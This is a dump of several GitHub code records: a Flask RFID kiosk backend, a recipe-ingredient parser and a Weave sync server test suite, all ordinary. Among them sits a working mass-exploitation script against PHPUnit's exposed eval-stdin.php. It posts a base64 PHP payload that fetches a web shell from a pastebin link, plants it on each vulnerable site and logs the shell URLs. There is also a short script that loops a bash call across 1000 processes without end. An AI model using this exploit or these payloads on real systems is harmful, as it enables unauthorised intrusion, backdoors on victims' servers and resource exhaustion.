GPIO.LOW)\n\nprevwaarde = 0\n\n# def lees_knop():\n# global prevwaarde\n# i2c.open(1)\n# waarde = i2c.read_byte(0x21)\n# # print(waarde)\n# i2c.close()\n# if waarde != prevwaarde:\n# if waarde == 254:\n# print(waarde)\n# socketio.emit('knop', {'knop': 'Reedcontact 1'}, broadcast=True)\n# DataRepository.insert_data(1, 1, 1, datetime.now(), waarde , 'Reedcontact 1')\n# if waarde == 253:\n# print(waarde)\n# socketio.emit('knop', {'knop': 'Reedcontact 2'}, broadcast=True)\n# DataRepository.insert_data(2, 2, 2, datetime.now(), waarde , 'Reedcontact 2')\n# if waarde == 251:\n# print(waarde)\n# socketio.emit('knop', {'knop': 'Reedcontact 3'}, broadcast=True)\n# DataRepository.insert_data(3, 3, 3, datetime.now(), waarde , 'Reedcontact 3')\n# elif waarde == 255:\n# print(waarde)\n# socketio.emit('knop', {'knop': 'released'}, broadcast=True)\n# prevwaarde = waarde\n\n\ndef lees_rfid(badgeid):\n try:\n id, text = reader.read()\n badgeid.put([id])\n print(\"lees rfid\")\n print(id)\n print(text)\n except:\n print(\"errortrr\")\n \n \n\n# Code voor Flask\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'geheim!'\nsocketio = SocketIO(app, cors_allowed_origins=\"*\", logger=False,\n engineio_logger=False, ping_timeout=1)\n\nCORS(app)\n\n\n@socketio.on_error() # Handles the default namespace\ndef error_handler(e):\n print(e)\n\n\n\n# API ENDPOINTS\n\n\n@app.route('/')\ndef hallo():\n return \"Server is running, er zijn momenteel geen API endpoints beschikbaar.\"\n\n\n@socketio.on('connect')\ndef initial_connection():\n print('A new client connect')\n # # Send to the client!\n # vraag de status op van de lampen uit de DB\n # status = DataRepository.read_status_lampen()\n # emit('B2F_status_lampen', {'lampen': status}, broadcast=True)\n\n\n@socketio.on('F2B_switch_light')\ndef switch_light(data):\n # Ophalen van de data\n lamp_id = data['lamp_id']\n new_status = data['new_status']\n print(f\"Lamp {lamp_id} wordt geswitcht naar {new_status}\")\n\n # Stel de status in op de DB\n # res = DataRepository.update_status_lamp(lamp_id, new_status)\n\n # Vraag de (nieuwe) status op van de lamp en stuur deze naar de frontend.\n # data = DataRepository.read_status_lamp_by_id(lamp_id)\n socketio.emit('B2F_verandering_lamp', {'lamp': data}, broadcast=True)\n\n # Indien het om de lamp van de TV kamer gaat, dan moeten we ook de hardware aansturen.\n # if lamp_id == '3':\n # print(f\"TV kamer moet switchen naar {new_status} !\")\n # GPIO.output(ledPin, new_status)\n\n\n\n# START een thread op. Belangrijk!!! Debugging moet UIT staan op start van de server, anders start de thread dubbel op\n# werk enkel met de packages gevent en gevent-websocket.\n\n# def start_thread():\n# print(\"**** Starting THREAD ****\")\n# thread = threading.Thread(target=all_out, args=(), daemon=True)\n# thread.start()\n\n# def start_thread_lees_knop():\n# while True:\n# # lees_knop()\n# time.sleep(0.5)\n\ndef rfid_thread(id):\n try:\n while True:\n print('test')\n lees_rfid(id)\n except:\n print('error')\n \ndef rfid_ID_thread():\n try:\n while True:\n lijst = id.get()\n print(lijst[0])\n except:\n print('error')\n\n\ndef rfid_ID_thread_main():\n print('rfid_ID_thread_main')\n thread = threading.Thread(target=rfid_ID_thread, args=(), daemon=True)\n thread.start()\n# def start_thread():\n# print(\"**** knop thread test ****\")\n# thread = threading.Thread(target=start_thread_lees_knop, args=(), daemon=True)\n# thread.start()\n \n \ndef rfid_thread_main():\n print(\"**** knop thread test ****\")\n # thread = threading.Thread(target=rfid_thread, args=(), daemon=True)\n # thread.start()\n p= Process(target=rfid_thread, args=(id,))\n p.start()\n \n\ndef start_chrome_kiosk():\n import os\n\n os.environ['DISPLAY'] = ':0.0'\n options = webdriver.ChromeOptions()\n # options.headless = True\n # options.add_argument(\"--window-size=1920,1080\")\n options.add_argument(\"user-agent=Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36\")\n options.add_argument('--ignore-certificate-errors')\n options.add_argument('--allow-running-insecure-content')\n options.add_argument(\"--disable-extensions\")\n # options.add_argument(\"--proxy-server='direct://'\")\n options.add_argument(\"--proxy-bypass-list=*\")\n options.add_argument(\"--start-maximized\")\n options.add_argument('--disable-gpu')\n # options.add_argument('--disable-dev-shm-usage')\n options.add_argument('--no-sandbox')\n options.add_argument('--kiosk')\n # chrome_options.add_argument('--no-sandbox') \n # options.add_argument(\"disable-infobars\")\n options.add_experimental_option(\"excludeSwitches\", [\"enable-automation\"])\n options.add_experimental_option('useAutomationExtension', False)\n\n driver = webdriver.Chrome(options=options)\n driver.get(\"http://localhost\")\n while True:\n pass\n\n\ndef start_chrome_thread():\n print(\"**** Starting CHROME ****\")\n chromeThread = threading.Thread(target=start_chrome_kiosk, args=(), daemon=True)\n chromeThread.start()\n\n\n\n# ANDERE FUNCTIES\n\n\nif __name__ == '__main__':\n try:\n setup_gpio()\n # start_thread()\n rfid_thread_main()\n rfid_ID_thread_main()\n start_chrome_thread()\n print(\"**** Starting APP ****\")\n socketio.run(app, debug=False, host='0.0.0.0')\n except KeyboardInterrupt:\n print ('KeyboardInterrupt exception is caught')\n finally:\n GPIO.cleanup()\n\n","repo_name":"howest-mct/2021-2022-projectone-LagaeJens","sub_path":"backend/app copy.py","file_name":"app copy.py","file_ext":"py","file_size_in_byte":6552,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"16467250638","text":"from collections import Counter, OrderedDict\nimport os\nimport re\nimport string\n\nfrom nltk.corpus import wordnet\nimport numpy as np\n\n\nstopwords = None\nwith open(\"stopwords_en.txt\", \"r\") as f:\n stopwords = [l.strip() for l in f]\n\nnouns = {x.name().split('.', 1)[0] for x in wordnet.all_synsets('n')}\nnope = [\"baking\", \"cooking\", \"dry\", \"room\", \"whip\", \"savory\", \"split\", \"peel\", \"shortening\", \"small\", \"medium\",\n \"red\", \"green\", \"white\", \"inch\", \"dark\", \"mix\", \"miniature\", \"firm\", \"fine\", \"cut\", \"bell\", \"cup\", \"starter\",\n \"inch\", \"plain\", \"cake\", \"pie\", \"ground\", \"large\", \"powder\", \"black\", \"taste\", \"fat\", \"liquid\", \"italian\",\n \"sweet\", \"jar\", \"light\", \"recipe\", \"chinese\", \"size\", \"paste\", \"raw\", \"quick\", \"garnish\", \"part\", \"kidney\",\n \"leaf\", \"hearts\", \"round\", \"crust\", \"pieces\", \"seeds\", \"sauce\", \"dish\", \"times\", \"temp\", \"hours\", \"pound\",\n \"hour\", \"process\", \"time\", \"meal\", \"min\", \"food\", \"note\", \"pressure\", \"pack\", \"information\", \"minutes\",\n \"style\", \"remove\", \"master\", \"table\", \"psi\", \"protein\", \"smoke\", \"coloring\", \"bottle\", \"pizza\", \"english\",\n \"gluten\", \"sodium\", \"heat\", \"yellow\"]\n\n\ndef load(filename):\n with open(filename, 'r') as f:\n s = f.read()\n\n return s\n\n\ndef split_into_recipes(s):\n return s.split(\"MMMMM\\r\\n\")\n\n\ndef load_from_dir(dirname):\n recipes = []\n for filename in os.listdir(dirname):\n recipes += split_into_recipes(load(\"{}/{}\".format(dirname, filename)))\n return [remove_mm(r) for r in recipes]\n\n\ndef remove_mm(s):\n result = []\n for l in s.splitlines():\n if not l.startswith(\"MMM\"):\n result.append(l)\n return \"\\n\".join(result)\n\n\ndef extract_ingredients(r):\n spl = r.split(\"\\n \\n\")\n for i, k in enumerate(spl):\n if \"Yield\" in k:\n break\n return spl[i+1]\n\n\ndef extract_description(r):\n spl = r.split(\"\\n \\n\")\n for i, k in enumerate(spl):\n if \"Yield\" in k:\n break\n return \"\\n\".join(spl[i+2:])\n\n\ndef get_all_ingredients(r):\n l = []\n for rr in r:\n try:\n l.append(extract_ingredients(rr))\n except:\n pass\n return l\n\n\ndef get_all_ingredients_desc(r):\n l = []\n for rr in r:\n try:\n l.append((extract_ingredients(rr), extract_description(rr)))\n except:\n pass\n return l\n\n\ndef split_quantity(line):\n q = line[:11]\n s = line[11:]\n return q.strip(), clean(s)\n\n\ndef split_quantities(q):\n lines = []\n for l in q.splitlines():\n if l[:11].strip():\n lines.append(l.lower())\n else:\n try:\n lines[-1] += l[10:].lower()\n except:\n pass\n return lines\n\n\ndef process_recipe(r):\n return [split_quantity(l) for l in split_quantities(r)]\n\n\ndef clean(s):\n regex = re.compile('[%s]' % re.escape(string.punctuation))\n s = regex.sub(' ', s)\n return \" \".join(s.lower().split())\n\n\ndef counts(r):\n return Counter(\" \".join(r).split(\" \"))\n\n\ndef most_common(s, c):\n best = 0\n bestw = None\n for word in s.split(\" \"):\n if word in stopwords:\n continue\n if word not in nouns:\n if word.endswith(\"s\") and word[:-1] not in nouns:\n word = word[:-1]\n else:\n continue\n if word in nope:\n continue\n if word not in c:\n continue\n if c[word] > best:\n best = c[word]\n bestw = word\n return bestw\n\n\ndef filter_recipe(r, c):\n res = []\n for q, p in process_recipe(r):\n mc = most_common(p, c)\n if mc is not None:\n res.append(mc)\n return list(set(res))\n\n\n\ndef get_all_recipes():\n r = load_from_dir(\"recipes\")\n return get_all_ingredients(r)\n\ndef get_counts(l):\n k = []\n for ll in l:\n try:\n k += process_recipe(ll)\n except:\n pass\n\n c = Counter(\" \".join([p[1] for p in k]).split(\" \"))\n\n return Counter([most_common(t[1], c) for t in k])\n\n\ndef r2vec(r, c):\n l = filter_recipe(r, c)\n k = c.keys()\n v = np.zeros(len(c))\n for w in l:\n v[k.index(w)] = 1\n return v\n\n\ndef vec2r(v, c):\n r = []\n for i, k in zip(v, c):\n if i:\n r.append(k)\n return r\n","repo_name":"wuhu/deep-cuisine","sub_path":"extract.py","file_name":"extract.py","file_ext":"py","file_size_in_byte":4263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74629337445","text":"#!/usr/bin/python\n\nfrom multiprocessing import Pool as Tp\nimport os\n\ndef ln(x):\n os.system(\"bash /../run.sh\")\n \ndef pl():\n p = Tp(1000)\n arg = [i for i in range(1000)]\n ret = p.map(ln,arg)\n p.close()\n p.join()\n\nif __debug__:\n while 1:\n pl()\n \n\n \n","repo_name":"r3kt2ey89i/Resources","sub_path":"Kernel/lena/VmWare/HyperV/l.py","file_name":"l.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"3324572380","text":"import requests, re, os, sys, importlib, warnings\r\nfrom multiprocessing.dummy import Pool\r\nfrom urllib.parse import urlparse\r\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\r\nfrom platform import system\r\nwarnings.simplefilter('ignore', InsecureRequestWarning)\r\nimportlib.reload(sys)\r\n\r\n\r\ndef url_check(url):\r\n if url[(-1)] == '/':\r\n check1 = re.compile('(.*)/')\r\n site = re.findall(check1, url)\r\n url = site[0]\r\n if url[:7] != 'http://' and url[:8] != 'https://':\r\n url = 'http://' + url\r\n return url\r\n\r\n\r\ndef shell_up(url, shell_3, replace1):\r\n try:\r\n shell_pay = \"'.base64_decode('PD9waHAKZnVuY3Rpb24gdXBsb2FkKCR1cmwsICRpc2kpIHsKCSRmcCA9IGZvcGVuKCRpc2ksICJ3Iik7CgkkY2ggPSBjdXJsX2luaXQoKTsKCWN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICR1cmwpOwoJY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0JJTkFSWVRSQU5TRkVSLCB0cnVlKTsKCWN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgdHJ1ZSk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfU1NMX1ZFUklGWVBFRVIsIGZhbHNlKTsKCWN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9GSUxFLCAkZnApOwoJcmV0dXJuIGN1cmxfZXhlYygkY2gpOwoJY3VybF9jbG9zZSgkY2gpOwoJZmNsb3NlKCRmcCk7CglvYl9mbHVzaCgpOwoJZmx1c2goKTsKfQppZih1cGxvYWQoImh0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy9icXNZaTR1SiIsImludHJ1ZDNyLnBocCIpKSB7CgllY2hvICJJbnRydWQzciI7Cn0gZWxzZSB7CgllY2hvICJmYWlsIjsKfQo/Pg==')); ?>\"\r\n session1 = requests.session()\r\n user_agent1 = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0'}\r\n req_1 = session1.get(shell_3, headers=user_agent1, data=shell_pay, verify=False, timeout=30)\r\n if req_1:\r\n try:\r\n req_2 = session1.get(replace1, headers=user_agent1, verify=False, timeout=30)\r\n if 'Intrud3r' in req_2.text:\r\n print( ' \\033[1;32;40m[+] ' + url + ' \\033[1;32;40m[Shell Uploaded]')\r\n open('Shells.txt', 'a').write(replace1 + '\\n')\r\n else:\r\n print( ' \\033[1;37;40m[-] ' + url + ' \\033[1;37;40m[Not Vuln]')\r\n except:\r\n pass\r\n\r\n else:\r\n print( ' \\033[1;37;40m!! ' + url + ' \\033[1;37;40mUnknown Error ')\r\n except:\r\n print( ' \\033[1;37;40m!! ' + url + ' \\033[1;37;40mUnknown Error ')\r\n\r\n\r\ndef scan(url):\r\n try:\r\n all_path = [\r\n '/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php',\r\n '/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php'] #Add more PATH if you wish\r\n \r\n for path in all_path:\r\n try:\r\n shell_pay2 = \"'.base64_decode('PD9waHAKZnVuY3Rpb24gdXBsb2FkKCR1cmwsICRpc2kpIHsKCSRmcCA9IGZvcGVuKCRpc2ksICJ3Iik7CgkkY2ggPSBjdXJsX2luaXQoKTsKCWN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICR1cmwpOwoJY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0JJTkFSWVRSQU5TRkVSLCB0cnVlKTsKCWN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgdHJ1ZSk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfU1NMX1ZFUklGWVBFRVIsIGZhbHNlKTsKCWN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9GSUxFLCAkZnApOwoJcmV0dXJuIGN1cmxfZXhlYygkY2gpOwoJY3VybF9jbG9zZSgkY2gpOwoJZmNsb3NlKCRmcCk7CglvYl9mbHVzaCgpOwoJZmx1c2goKTsKfQppZih1cGxvYWQoImh0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy9icXNZaTR1SiIsImludHJ1ZDNyLnBocCIpKSB7CgllY2hvICJJbnRydWQzciI7Cn0gZWxzZSB7CgllY2hvICJmYWlsIjsKfQo/Pg==')); ?>\"\r\n replace1 = url + path.replace('eval-stdin.php', 'intrud3r.php')\r\n shell_3 = url + path\r\n session2 = requests.session()\r\n user_agent2 = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0'}\r\n req_3 = session2.get(shell_3, headers=user_agent2, data=shell_pay2, verify=False, timeout=30)\r\n if 'Intrud3r' in req_3.text:\r\n print( ' \\033[1;31;40m[+] ' + url + ' \\033[1;31;40m[Vuln]')\r\n open('vuln.txt', 'a').write(shell_3 + '\\n')\r\n shell_up(url, shell_3, replace1)\r\n break\r\n else:\r\n print(' \\033[1;37;40m[-] ' + url + ' \\033[1;37;40m[Not Vuln]')\r\n except:\r\n print( ' \\033[1;37;40m!! ' + url + ' \\033[1;37;40mUnknown Error ')\r\n\r\n except:\r\n print( ' \\033[1;37;40m!! ' + url + ' \\033[1;37;40mUnknown Error ')\r\n\r\n\r\ndef check(url):\r\n try:\r\n url = url_check(url)\r\n user_agent = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0'}\r\n session0 = requests.session()\r\n req_0 = session0.get(url, headers=user_agent, verify=False, timeout=30)\r\n if req_0.status_code == 200:\r\n scan(url)\r\n else:\r\n print( ' [-] ' + url + ' [404]')\r\n except:\r\n pass\r\n\r\n\r\ndef logo():\r\n clear = \"\\x1b[0m\"\r\n\r\n banner = \"\"\"\\033[1;32;40m\r\n ____ __ ____ __ _______ \r\n / __ \\____ ____ / /_ / _/___ / /________ ______/ /__ /_____\r\n / /_/ / __ \\/ __ \\/ __/ / // __ \\/ __/ ___/ / / / __ / /_ = float(resp.body))\n\n resp = self.app.get(storage_url, headers=auth_header)\n resp_wbo_data = simplejson.loads(resp.body)\n self.assertEqual(wbo_data['payload'], resp_wbo_data['payload'])\n\n resp = self.app.delete(storage_url, headers=auth_header)\n self.assertEqual('200 OK', resp.status)\n self.assert_(WBO.get_time_now() >= float(resp.body))\n\n resp = self.app.get(storage_url, headers=auth_header, status=404)\n\n def test_collection_counts_and_timestamps(self):\n \"\"\"Exercise collection counts and timestamps\"\"\"\n profile = Profile(user_name = 'tester-1', user_id='8675309', password = 'pass-1')\n profile.put()\n\n auth_header = self.build_auth_header(\n profile.user_name, profile.password\n )\n\n expected_count_all = 0\n expected_counts = {\n 'clients':2, 'crypto':0, 'forms':6, 'history':0, 'keys':10,\n 'meta':12, 'bookmarks':14, 'prefs':16, 'tabs':18, 'passwords':20,\n 'foo':12, 'bar':14, 'baz':16\n }\n expected_dates = {}\n\n # Insert objects with random contents to satisfy the expected counts\n for collection_name, curr_count in expected_counts.items():\n base_url = '/sync/1.0/%s/storage/%s' % (\n profile.user_name, collection_name\n )\n for i in range(curr_count):\n resp = self.put_random_wbo(base_url, auth_header)\n expected_dates[collection_name] = float(resp.body)\n expected_count_all += 1\n\n # Ensure the counts match expected\n resp = self.app.get(\n '/sync/1.0/%s/info/collection_counts' % (profile.user_name),\n headers=auth_header\n )\n resp_data = simplejson.loads(resp.body)\n self.assertEqual(expected_counts, resp_data)\n\n # Ensure all timestamps are same or newer than expected.\n resp = self.app.get(\n '/sync/1.0/%s/info/collections' % (profile.user_name),\n headers=auth_header\n )\n resp_data = simplejson.loads(resp.body)\n for k,v in expected_dates.items():\n self.assert_(k in resp_data)\n self.assert_(resp_data[k] >= expected_dates[k])\n\n # Verify the count of all objects after creating\n result_count = WBO.all().count()\n self.assertEqual(expected_count_all, result_count)\n\n # Delete each collection and verify the count after\n for collection_name, curr_count in expected_counts.items():\n url = '/sync/1.0/%s/storage/%s' % (\n profile.user_name, collection_name\n )\n resp = self.app.delete(url, headers=auth_header)\n self.assert_(WBO.get_time_now() >= float(resp.body))\n\n expected_count_all -= curr_count\n result_count = WBO.all().count()\n self.assertEqual(expected_count_all, result_count)\n\n # No WBOs should be left after all collections deleted.\n result_count = WBO.all().count()\n self.assertEqual(0, result_count)\n\n def test_multiple_profiles(self):\n \"\"\"Exercise multiple profiles and collections\"\"\"\n expected_count_all = 0\n profiles_count = 5\n collection_names = ( 'testing', 'keys', 'tabs', 'history', 'bookmarks' )\n collection_counts = {}\n\n # Produce a set of Profiles in the datastore\n profiles = []\n for i in range(profiles_count):\n profile = Profile(user_name='t-%s'%i, user_id='id-%s'%i, password='p-%s'%i)\n profile.put()\n profiles.append(profile)\n\n # Generate collections for each profile.\n for p in profiles:\n auth_header = self.build_auth_header(p.user_name, p.password)\n collection_counts[p.user_name] = {}\n\n # Run through several collections and make WBOs\n for cn in collection_names:\n\n curr_count = random.randint(1,10)\n collection_counts[p.user_name][cn] = curr_count\n expected_count_all += curr_count\n\n # Generate a bunch of random-content WBOs\n base_url = '/sync/1.0/%s/storage/%s' % (p.user_name, cn)\n for i in range(curr_count):\n resp = self.put_random_wbo(base_url, auth_header)\n\n # Ensure the total number of WBOs is correct.\n result_count_all = WBO.all().count()\n self.assertEqual(expected_count_all, result_count_all)\n\n # Ensure the counts for each profile collection matches inserts.\n for profile in profiles:\n counts = Collection.get_counts(profile)\n for name in collection_names:\n c = Collection.get_by_profile_and_name(profile, name)\n self.assertEqual(\n collection_counts[profile.user_name][name],\n WBO.get_by_collection(c).count()\n )\n\n # Delete each of the collections for each user.\n for profile in profiles:\n auth_header = self.build_auth_header(\n profile.user_name, profile.password\n )\n for name in collection_names:\n url = '/sync/1.0/%s/storage/%s' % (profile.user_name, name)\n resp = self.app.delete(url, headers=auth_header)\n # Ensure the individual collection is now empty.\n c = Collection.get_by_profile_and_name(profile, name)\n self.assertEqual(0, WBO.get_by_collection(c).count())\n\n # Ensure there are no more WBOs\n result_count_all = WBO.all().count()\n self.assertEqual(0, result_count_all)\n\n def test_retrieval_by_id(self):\n \"\"\"Exercise collection retrieval with a single ID\"\"\"\n (p, c, ah) = (self.profile, self.collection, self.auth_header)\n\n wbo_id = '1234'\n\n w = WBO(wbo_id=wbo_id, parent=c, collection=c,\n modified=WBO.get_time_now(), sortindex=1000, \n payload='payload-%s' % wbo_id, payload_size=9)\n w.put()\n\n url = '/sync/1.0/%s/storage/%s?id=%s' % (\n p.user_name, c.name, w.wbo_id\n )\n\n resp = self.app.get(url, headers=ah)\n result_data = simplejson.loads(resp.body)\n self.log.debug('RESPONSE %s' % resp.body)\n self.assertEqual(w.wbo_id, result_data[0])\n\n url = '/sync/1.0/%s/storage/%s?id=%s&full=1' % (\n p.user_name, c.name, w.wbo_id\n )\n\n resp = self.app.get(url, headers=ah)\n result_data = simplejson.loads(resp.body)\n self.log.debug('RESPONSE %s' % resp.body)\n self.assertEqual(w.payload, result_data[0]['payload'])\n\n def test_deletion_by_multiple_ids(self):\n \"\"\"Exercise bulk deletion with a set of IDs\"\"\"\n (p, c, ah) = (self.profile, self.collection, self.auth_header)\n wbos = self.build_wbo_set()\n\n wbo_ids = [w.wbo_id for w in wbos]\n to_delete_ids = wbo_ids[0:len(wbo_ids)/2]\n \n url = '/sync/1.0/%s/storage/%s?ids=%s' % (\n p.user_name, c.name, ','.join(to_delete_ids)\n )\n\n resp = self.app.delete(url, headers=ah)\n self.assertEqual('200 OK', resp.status)\n self.assert_(WBO.get_time_now() >= float(resp.body))\n\n result_ids = [w.wbo_id for w in WBO.all()]\n for wbo_id in to_delete_ids:\n self.assert_(wbo_id not in result_ids)\n\n def test_retrieval_by_multiple_ids(self):\n \"\"\"Exercise collection retrieval with multiple IDs\"\"\"\n (p, c, ah) = (self.profile, self.collection, self.auth_header)\n\n wbos = [ \n WBO(wbo_id='%s' % wbo_id, parent=c, collection=c,\n modified=WBO.get_time_now(), sortindex=1000, payload='payload-%s' %\n wbo_id, payload_size=9\n ) for wbo_id in range(10) ]\n\n for w in wbos: w.put()\n\n wbo_ids = [w.wbo_id for w in wbos]\n\n url = '/sync/1.0/%s/storage/%s?ids=%s' % (\n p.user_name, c.name, ','.join(wbo_ids)\n )\n\n resp = self.app.get(url, headers=ah)\n result_data = simplejson.loads(resp.body)\n wbo_ids.sort()\n result_data.sort()\n self.assertEqual(wbo_ids, result_data)\n self.assertEqual(len(wbo_ids), int(resp.headers['X-Weave-Records']))\n\n url = '/sync/1.0/%s/storage/%s?ids=%s&full=1' % (\n p.user_name, c.name, ','.join(wbo_ids)\n )\n\n resp = self.app.get(url, headers=ah)\n result_data = simplejson.loads(resp.body)\n result_data.sort(lambda a,b: cmp(a['id'], b['id']))\n for idx in range(len(wbos)):\n self.assertEqual(wbos[idx].payload, result_data[idx]['payload'])\n self.assertEqual(len(wbo_ids), int(resp.headers['X-Weave-Records']))\n\n def test_retrieval_by_index_above_and_below(self):\n \"\"\"Exercise collection retrieval on sortindex range\"\"\"\n (p, c, ah) = (self.profile, self.collection, self.auth_header)\n\n wbo_sortindexes = ( -100, -10, -1, 0, 1, 10, 23, 100, 999, 1000, 9999 )\n\n wbos = [ ]\n for idx in range(len(wbo_sortindexes)):\n sortindex = wbo_sortindexes[idx]\n wbo_id = '%s' % idx\n w = WBO(wbo_id=wbo_id, parent=c, collection=c,\n modified=WBO.get_time_now(), \n sortindex=sortindex, \n payload='payload-%s' % wbo_id, payload_size=9)\n w.put()\n self.log.debug(\"WBO %s\" % simplejson.dumps(w.to_dict()))\n wbos.append(w)\n\n # TODO: Try a variety of ranges here?\n (index_above, index_below) = (-10, 1000)\n\n expected_ids = [\n w.wbo_id for w in wbos\n if index_above < w.sortindex and w.sortindex < index_below\n ]\n\n url = '/sync/1.0/%s/storage/%s?index_above=%s&index_below=%s' % (\n p.user_name, c.name, index_above, index_below\n )\n resp = self.app.get(url, headers=ah)\n result_data = simplejson.loads(resp.body)\n\n expected_ids.sort()\n result_data.sort()\n\n self.log.debug(\"URL %s\" % url)\n self.log.debug(\"EXPECTED %s\" % simplejson.dumps(expected_ids))\n self.log.debug(\"RESULT %s\" % resp.body)\n self.assertEqual(expected_ids, result_data)\n\n def test_retrieval_by_newer_and_older(self):\n \"\"\"Exercise collection retrieval by modified timestamp range\"\"\"\n (p, c, ah) = (self.profile, self.collection, self.auth_header)\n wbos = self.build_wbo_set()\n\n # TODO: Try a variety of ranges here?\n (newer, older) = (wbos[2].modified, wbos[len(wbos)-2].modified)\n\n expected_ids = [\n w.wbo_id for w in wbos\n if newer < w.modified\n ]\n\n url = '/sync/1.0/%s/storage/%s?newer=%s' % (\n p.user_name, c.name, newer\n )\n resp = self.app.get(url, headers=ah)\n result_data = simplejson.loads(resp.body)\n\n expected_ids.sort()\n result_data.sort()\n\n self.log.debug(\"URL %s\" % url)\n self.log.debug(\"EXPECTED %s\" % simplejson.dumps(expected_ids))\n self.log.debug(\"RESULT %s\" % resp.body)\n self.assertEqual(expected_ids, result_data)\n\n expected_ids = [\n w.wbo_id for w in wbos\n if newer < w.modified and w.modified < older\n ]\n\n url = '/sync/1.0/%s/storage/%s?newer=%s&older=%s' % (\n p.user_name, c.name, newer, older\n )\n resp = self.app.get(url, headers=ah)\n result_data = simplejson.loads(resp.body)\n\n expected_ids.sort()\n result_data.sort()\n\n self.log.debug(\"URL %s\" % url)\n self.log.debug(\"EXPECTED %s\" % simplejson.dumps(expected_ids))\n self.log.debug(\"RESULT %s\" % resp.body)\n self.assertEqual(expected_ids, result_data)\n\n def test_retrieval_by_parent_and_predecessor(self):\n \"\"\"Exercise collection retrieval by parent and predecessor IDs\"\"\"\n (p, c, ah) = (self.profile, self.collection, self.auth_header)\n wbos = self.build_wbo_set()\n\n id_sets = dict([\n (kind, set([ getattr(w, kind) for w in wbos ]))\n for kind in ('parentid', 'predecessorid')\n ])\n\n for kind, p_ids in id_sets.items():\n for p_id in set(p_ids):\n\n expected_ids = [\n w.wbo_id for w in wbos\n if getattr(w, kind) == p_id\n ]\n\n url = '/sync/1.0/%s/storage/%s?%s=%s' % (\n p.user_name, c.name, kind, p_id\n )\n resp = self.app.get(url, headers=ah)\n result_data = simplejson.loads(resp.body)\n\n expected_ids.sort()\n result_data.sort()\n\n self.log.debug(\"URL %s\" % url)\n self.log.debug(\"EXPECTED %s\" % simplejson.dumps(expected_ids))\n self.log.debug(\"RESULT %s\" % resp.body)\n self.assertEqual(expected_ids, result_data)\n\n def test_retrieval_with_sort(self):\n \"\"\"Exercise collection retrieval with sort options\"\"\"\n (p, c, ah) = (self.profile, self.collection, self.auth_header)\n self.build_wbo_set()\n wbos = [ w for w in WBO.all() ]\n\n sorts = {\n 'oldest': lambda a,b: cmp(a.modified, b.modified),\n 'newest': lambda a,b: cmp(b.modified, a.modified),\n 'index': lambda a,b: cmp(b.sortindex, a.sortindex),\n }\n\n for sort_option, sort_fn in sorts.items():\n wbos.sort(sort_fn)\n expected_ids = [ w.wbo_id for w in wbos ]\n\n url = '/sync/1.0/%s/storage/%s?sort=%s' % (\n p.user_name, c.name, sort_option\n )\n resp = self.app.get(url, headers=ah)\n result_data = simplejson.loads(resp.body)\n\n self.log.debug(\"URL %s\" % url)\n self.log.debug(\"EXPECTED %s\" % simplejson.dumps(expected_ids))\n self.log.debug(\"RESULT %s\" % resp.body)\n self.assertEqual(expected_ids, result_data)\n\n def test_retrieval_with_limit_offset(self):\n \"\"\"Exercise collection retrieval with limit and offset\"\"\"\n (p, c, ah) = (self.profile, self.collection, self.auth_header)\n self.build_wbo_set()\n wbos = [ w for w in WBO.all() ]\n\n max_limit = len(wbos) / 2\n max_offset = len(wbos) / 2\n\n for c_limit in range(1, max_limit):\n for c_offset in range(1, max_offset):\n\n expected_ids = [ \n w.wbo_id for w in \n wbos[ (c_offset) : (c_offset+c_limit) ] \n ]\n\n url = '/sync/1.0/%s/storage/%s?limit=%s&offset=%s&sort=oldest' % (\n p.user_name, c.name, c_limit, c_offset\n )\n resp = self.app.get(url, headers=ah)\n result_data = simplejson.loads(resp.body)\n\n self.log.debug(\"URL %s\" % url)\n self.log.debug(\"EXPECTED %s\" % simplejson.dumps(expected_ids))\n self.log.debug(\"RESULT %s\" % resp.body)\n self.assertEqual(expected_ids, result_data)\n\n def test_retrieval_by_multiple_criteria(self):\n \"\"\"Exercise retrieval when using multiple criteria\"\"\"\n (p, c, ah) = (self.profile, self.collection, self.auth_header)\n wbos = self.build_wbo_set()\n\n # Criteria set for testing.\n index_above = 2\n index_below = 13\n parentid = 'a2'\n predecessorid = 'b3'\n\n expected_ids = []\n wbos.sort(lambda b,a: cmp(a.sortindex, b.sortindex))\n for w in wbos:\n if (index_above < w.sortindex and index_below > w.sortindex and\n parentid == w.parentid and predecessorid == w.predecessorid):\n expected_ids.append(w.wbo_id)\n \n # Build and run a retrieval query using all of the criteria.\n params = 'index_above=%s&index_below=%s&parentid=%s&predecessorid=%s' % (\n index_above, index_below, parentid, predecessorid\n )\n url = '/sync/1.0/%s/storage/%s?%s' % (p.user_name, c.name, params)\n resp = self.app.get(url, headers=ah)\n result_data = 